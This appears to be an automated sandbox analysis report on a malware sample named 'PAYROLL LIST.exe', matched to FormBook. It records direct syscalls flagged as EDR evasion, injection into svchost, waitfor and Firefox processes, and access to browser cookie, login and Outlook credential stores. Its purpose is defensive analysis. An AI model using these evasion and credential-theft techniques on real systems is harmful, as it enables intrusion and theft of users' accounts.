Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03328918 mov eax, dword ptr fs:[00000030h]	2_2_03328918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03328918 mov eax, dword ptr fs:[00000030h]	2_2_03328918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE908 mov eax, dword ptr fs:[00000030h]	2_2_033AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE908 mov eax, dword ptr fs:[00000030h]	2_2_033AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D4978 mov eax, dword ptr fs:[00000030h]	2_2_033D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D4978 mov eax, dword ptr fs:[00000030h]	2_2_033D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BC97C mov eax, dword ptr fs:[00000030h]	2_2_033BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]	2_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]	2_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]	2_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0337096E mov eax, dword ptr fs:[00000030h]	2_2_0337096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0337096E mov edx, dword ptr fs:[00000030h]	2_2_0337096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0337096E mov eax, dword ptr fs:[00000030h]	2_2_0337096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B0946 mov eax, dword ptr fs:[00000030h]	2_2_033B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B89B3 mov esi, dword ptr fs:[00000030h]	2_2_033B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B89B3 mov eax, dword ptr fs:[00000030h]	2_2_033B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B89B3 mov eax, dword ptr fs:[00000030h]	2_2_033B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033309AD mov eax, dword ptr fs:[00000030h]	2_2_033309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033309AD mov eax, dword ptr fs:[00000030h]	2_2_033309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033629F9 mov eax, dword ptr fs:[00000030h]	2_2_033629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033629F9 mov eax, dword ptr fs:[00000030h]	2_2_033629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_033BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033649D0 mov eax, dword ptr fs:[00000030h]	2_2_033649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_033FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C69C0 mov eax, dword ptr fs:[00000030h]	2_2_033C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]	2_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]	2_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]	2_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352835 mov ecx, dword ptr fs:[00000030h]	2_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]	2_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]	2_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A830 mov eax, dword ptr fs:[00000030h]	2_2_0336A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D483A mov eax, dword ptr fs:[00000030h]	2_2_033D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D483A mov eax, dword ptr fs:[00000030h]	2_2_033D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BC810 mov eax, dword ptr fs:[00000030h]	2_2_033BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BE872 mov eax, dword ptr fs:[00000030h]	2_2_033BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BE872 mov eax, dword ptr fs:[00000030h]	2_2_033BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C6870 mov eax, dword ptr fs:[00000030h]	2_2_033C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C6870 mov eax, dword ptr fs:[00000030h]	2_2_033C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03360854 mov eax, dword ptr fs:[00000030h]	2_2_03360854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03334859 mov eax, dword ptr fs:[00000030h]	2_2_03334859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03334859 mov eax, dword ptr fs:[00000030h]	2_2_03334859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03342840 mov ecx, dword ptr fs:[00000030h]	2_2_03342840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BC89D mov eax, dword ptr fs:[00000030h]	2_2_033BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330887 mov eax, dword ptr fs:[00000030h]	2_2_03330887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0336C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0336C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FA8E4 mov eax, dword ptr fs:[00000030h]	2_2_033FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0335E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335EF28 mov eax, dword ptr fs:[00000030h]	2_2_0335EF28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03332F12 mov eax, dword ptr fs:[00000030h]	2_2_03332F12
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404F68 mov eax, dword ptr fs:[00000030h]	2_2_03404F68
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336CF1F mov eax, dword ptr fs:[00000030h]	2_2_0336CF1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E6F00 mov eax, dword ptr fs:[00000030h]	2_2_033E6F00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335AF69 mov eax, dword ptr fs:[00000030h]	2_2_0335AF69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335AF69 mov eax, dword ptr fs:[00000030h]	2_2_0335AF69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2F60 mov eax, dword ptr fs:[00000030h]	2_2_033D2F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2F60 mov eax, dword ptr fs:[00000030h]	2_2_033D2F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332CF50 mov eax, dword ptr fs:[00000030h]	2_2_0332CF50

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A5A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00A5A66C

Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A481AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00A481AC
Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Code function: 0_2_00A48189 SetUnhandledExceptionFilter,		0_2_00A48189

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtTerminateThread: Direct from: 0x77382FCC	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtAllocateVirtualMemory: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	NtProtectVirtualMemory: Direct from: 0x77377B2E	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\waitfor.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: NULL target: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: NULL target: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\waitfor.exe

Thread register set: target process: 3476

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\waitfor.exe

Thread APC queued: target process: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 8E8008

Jump to behavior

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A5B106 LogonUserW,

0_2_00A5B106

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A23D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00A23D19

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A6411C SendInput,keybd_event,

0_2_00A6411C

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A674BB mouse_event,

0_2_00A674BB

Source: C:\Users\user\Desktop\PAYROLL LIST.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PAYROLL LIST.exe"	Jump to behavior
Source: C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe	Process created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

0_2_00A5A66C

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A671FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00A671FA

Source: XQNtOWkQlf.exe, 00000004.00000002.4577432645.0000000001810000.00000002.00000001.00040000.00000000.sdmp, XQNtOWkQlf.exe, 00000004.00000000.2329599437.0000000001810000.00000002.00000001.00040000.00000000.sdmp, XQNtOWkQlf.exe, 00000007.00000000.2475604301.0000000001810000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: PAYROLL LIST.exe, XQNtOWkQlf.exe, 00000004.00000002.4577432645.0000000001810000.00000002.00000001.00040000.00000000.sdmp, XQNtOWkQlf.exe, 00000004.00000000.2329599437.0000000001810000.00000002.00000001.00040000.00000000.sdmp, XQNtOWkQlf.exe, 00000007.00000000.2475604301.0000000001810000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: XQNtOWkQlf.exe, 00000004.00000002.4577432645.0000000001810000.00000002.00000001.00040000.00000000.sdmp, XQNtOWkQlf.exe, 00000004.00000000.2329599437.0000000001810000.00000002.00000001.00040000.00000000.sdmp, XQNtOWkQlf.exe, 00000007.00000000.2475604301.0000000001810000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: PAYROLL LIST.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: XQNtOWkQlf.exe, 00000004.00000002.4577432645.0000000001810000.00000002.00000001.00040000.00000000.sdmp, XQNtOWkQlf.exe, 00000004.00000000.2329599437.0000000001810000.00000002.00000001.00040000.00000000.sdmp, XQNtOWkQlf.exe, 00000007.00000000.2475604301.0000000001810000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A465C4 cpuid

0_2_00A465C4

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A7091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,

0_2_00A7091D

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A9B340 GetUserNameW,

0_2_00A9B340

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A51E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00A51E8E

Source: C:\Users\user\Desktop\PAYROLL LIST.exe

Code function: 0_2_00A3DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00A3DDC0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4582414489.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4571302194.0000000002740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2407829653.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4584294088.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2407461524.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4581284077.0000000004350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2408321100.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\waitfor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\waitfor.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\waitfor.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: PAYROLL LIST.exe	Binary or memory string: WIN_81
Source: PAYROLL LIST.exe	Binary or memory string: WIN_XP
